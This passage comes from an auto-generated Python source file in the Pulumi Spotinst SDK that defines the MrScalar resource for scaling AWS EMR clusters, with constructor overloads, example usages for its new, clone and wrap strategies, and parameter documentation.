core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Provides a Spotinst AWS MrScaler resource.
## Example Usage
### New Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
additional_info="{'test':'more information'}",
additional_primary_security_groups=["sg-456321"],
additional_replica_security_groups=["sg-123654"],
applications=[
spotinst.aws.MrScalarApplicationArgs(
name="Ganglia",
version="1.0",
),
spotinst.aws.MrScalarApplicationArgs(
name="Hadoop",
),
spotinst.aws.MrScalarApplicationArgs(
args=[
"fake",
"args",
],
name="Pig",
),
],
availability_zones=["us-west-2a:subnet-123456"],
bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
bucket="sample-emr-test",
key="bootstrap-actions.json",
)],
configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
bucket="example-bucket",
key="configurations.json",
)],
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
custom_ami_id="ami-123456",
description="Testing MrScaler creation",
ec2_key_name="test-key",
instance_weights=[
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.small",
weighted_capacity=10,
),
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.medium",
weighted_capacity=90,
),
],
job_flow_role="EMR_EC2_ExampleRole",
keep_job_flow_alive=True,
log_uri="s3://example-logs",
managed_primary_security_group="sg-123456",
managed_replica_security_group="sg-987654",
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
timeout=15,
timeout_action="terminateAndRetry",
),
region="us-west-2",
release_label="emr-5.17.0",
repo_upgrade_on_boot="NONE",
retries=2,
security_config="example-config",
service_access_security_group="access-example",
service_role="example-role",
steps_files=[spotinst.aws.MrScalarStepsFileArgs(
bucket="example-bucket",
key="steps.json",
)],
strategy="new",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_unit="instance",
termination_protected=False)
```
### Clone Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
availability_zones=["us-west-2a:subnet-12345678"],
cluster_id="j-123456789",
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
description="Testing MrScaler creation",
expose_cluster_id=True,
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
region="us-west-2",
strategy="clone",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
action_type="",
adjustment="1",
cooldown=60,
dimensions={
"name": "name-1",
"value": "value-1",
},
evaluation_periods=10,
max_target_capacity="1",
maximum="10",
metric_name="CPUUtilization",
minimum="0",
namespace="AWS/EC2",
operator="gt",
period=60,
policy_name="policy-name",
statistic="average",
target="5",
threshold=10,
unit="",
)],
task_unit="instance")
pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
```
### Wrap Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
cluster_id="j-27UVDEHXL4OQM",
description="created by Pulumi",
region="us-west-2",
strategy="wrap",
task_desired_capacity=2,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=20,
volume_type="gp2",
volumes_per_instance=1,
)],
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=4,
task_min_size=0,
task_unit="instance")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MrScalarArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Spotinst AWS MrScaler resource.
## Example Usage
### New Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
additional_info="{'test':'more information'}",
additional_primary_security_groups=["sg-456321"],
additional_replica_security_groups=["sg-123654"],
applications=[
spotinst.aws.MrScalarApplicationArgs(
name="Ganglia",
version="1.0",
),
spotinst.aws.MrScalarApplicationArgs(
name="Hadoop",
),
spotinst.aws.MrScalarApplicationArgs(
args=[
"fake",
"args",
],
name="Pig",
),
],
availability_zones=["us-west-2a:subnet-123456"],
bootstrap_actions_files=[spotinst.aws.MrScalarBootstrapActionsFileArgs(
bucket="sample-emr-test",
key="bootstrap-actions.json",
)],
configurations_files=[spotinst.aws.MrScalarConfigurationsFileArgs(
bucket="example-bucket",
key="configurations.json",
)],
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
custom_ami_id="ami-123456",
description="Testing MrScaler creation",
ec2_key_name="test-key",
instance_weights=[
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.small",
weighted_capacity=10,
),
spotinst.aws.MrScalarInstanceWeightArgs(
instance_type="t2.medium",
weighted_capacity=90,
),
],
job_flow_role="EMR_EC2_ExampleRole",
keep_job_flow_alive=True,
log_uri="s3://example-logs",
managed_primary_security_group="sg-123456",
managed_replica_security_group="sg-987654",
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
provisioning_timeout=spotinst.aws.MrScalarProvisioningTimeoutArgs(
timeout=15,
timeout_action="terminateAndRetry",
),
region="us-west-2",
release_label="emr-5.17.0",
repo_upgrade_on_boot="NONE",
retries=2,
security_config="example-config",
service_access_security_group="access-example",
service_role="example-role",
steps_files=[spotinst.aws.MrScalarStepsFileArgs(
bucket="example-bucket",
key="steps.json",
)],
strategy="new",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_unit="instance",
termination_protected=False)
```
### Clone Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
sample__mr_scaler_01 = spotinst.aws.MrScalar("sample-MrScaler-01",
availability_zones=["us-west-2a:subnet-12345678"],
cluster_id="j-123456789",
core_desired_capacity=1,
core_ebs_block_devices=[spotinst.aws.MrScalarCoreEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
core_ebs_optimized=False,
core_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
core_lifecycle="ON_DEMAND",
core_max_size=1,
core_min_size=1,
core_unit="instance",
description="Testing MrScaler creation",
expose_cluster_id=True,
master_ebs_block_devices=[spotinst.aws.MrScalarMasterEbsBlockDeviceArgs(
size_in_gb=30,
volume_type="gp2",
volumes_per_instance=1,
)],
master_ebs_optimized=True,
master_instance_types=["c3.xlarge"],
master_lifecycle="SPOT",
master_target=1,
region="us-west-2",
strategy="clone",
tags=[spotinst.aws.MrScalarTagArgs(
key="Creator",
value="Pulumi",
)],
task_desired_capacity=1,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=40,
volume_type="gp2",
volumes_per_instance=2,
)],
task_ebs_optimized=False,
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=30,
task_min_size=0,
task_scaling_down_policies=[spotinst.aws.MrScalarTaskScalingDownPolicyArgs(
action_type="",
adjustment="1",
cooldown=60,
dimensions={
"name": "name-1",
"value": "value-1",
},
evaluation_periods=10,
max_target_capacity="1",
maximum="10",
metric_name="CPUUtilization",
minimum="0",
namespace="AWS/EC2",
operator="gt",
period=60,
policy_name="policy-name",
statistic="average",
target="5",
threshold=10,
unit="",
)],
task_unit="instance")
pulumi.export("mrscaler-name", sample__mr_scaler_01.name)
pulumi.export("mrscaler-created-cluster-id", sample__mr_scaler_01.output_cluster_id)
```
### Wrap Strategy
```python
import pulumi
import pulumi_spotinst as spotinst
example_scaler_2 = spotinst.aws.MrScalar("example-scaler-2",
cluster_id="j-27UVDEHXL4OQM",
description="created by Pulumi",
region="us-west-2",
strategy="wrap",
task_desired_capacity=2,
task_ebs_block_devices=[spotinst.aws.MrScalarTaskEbsBlockDeviceArgs(
size_in_gb=20,
volume_type="gp2",
volumes_per_instance=1,
)],
task_instance_types=[
"c3.xlarge",
"c4.xlarge",
],
task_lifecycle="SPOT",
task_max_size=4,
task_min_size=0,
task_unit="instance")
```
:param str resource_name: The name of the resource.
:param MrScalarArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MrScalarArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MrScalarArgs.__new__(MrScalarArgs)
__props__.__dict__["additional_info"] = additional_info
__props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
__props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
__props__.__dict__["applications"] = applications
__props__.__dict__["availability_zones"] = availability_zones
__props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["configurations_files"] = configurations_files
__props__.__dict__["core_desired_capacity"] = core_desired_capacity
__props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
__props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
__props__.__dict__["core_instance_types"] = core_instance_types
__props__.__dict__["core_lifecycle"] = core_lifecycle
__props__.__dict__["core_max_size"] = core_max_size
__props__.__dict__["core_min_size"] = core_min_size
__props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
__props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
__props__.__dict__["core_unit"] = core_unit
__props__.__dict__["custom_ami_id"] = custom_ami_id
__props__.__dict__["description"] = description
__props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
__props__.__dict__["ec2_key_name"] = ec2_key_name
__props__.__dict__["expose_cluster_id"] = expose_cluster_id
__props__.__dict__["instance_weights"] = instance_weights
__props__.__dict__["job_flow_role"] = job_flow_role
__props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
__props__.__dict__["log_uri"] = log_uri
__props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
__props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
__props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
__props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
__props__.__dict__["master_instance_types"] = master_instance_types
__props__.__dict__["master_lifecycle"] = master_lifecycle
__props__.__dict__["master_target"] = master_target
__props__.__dict__["name"] = name
__props__.__dict__["provisioning_timeout"] = provisioning_timeout
__props__.__dict__["region"] = region
__props__.__dict__["release_label"] = release_label
__props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
__props__.__dict__["retries"] = retries
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_config"] = security_config
__props__.__dict__["service_access_security_group"] = service_access_security_group
__props__.__dict__["service_role"] = service_role
__props__.__dict__["steps_files"] = steps_files
if strategy is None and not opts.urn:
raise TypeError("Missing required property 'strategy'")
__props__.__dict__["strategy"] = strategy
__props__.__dict__["tags"] = tags
__props__.__dict__["task_desired_capacity"] = task_desired_capacity
__props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
__props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
__props__.__dict__["task_instance_types"] = task_instance_types
__props__.__dict__["task_lifecycle"] = task_lifecycle
__props__.__dict__["task_max_size"] = task_max_size
__props__.__dict__["task_min_size"] = task_min_size
__props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
__props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
__props__.__dict__["task_unit"] = task_unit
__props__.__dict__["termination_policies"] = termination_policies
__props__.__dict__["termination_protected"] = termination_protected
if visible_to_all_users is not None and not opts.urn:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
__props__.__dict__["visible_to_all_users"] = visible_to_all_users
__props__.__dict__["output_cluster_id"] = None
super(MrScalar, __self__).__init__(
'spotinst:aws/mrScalar:MrScalar',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
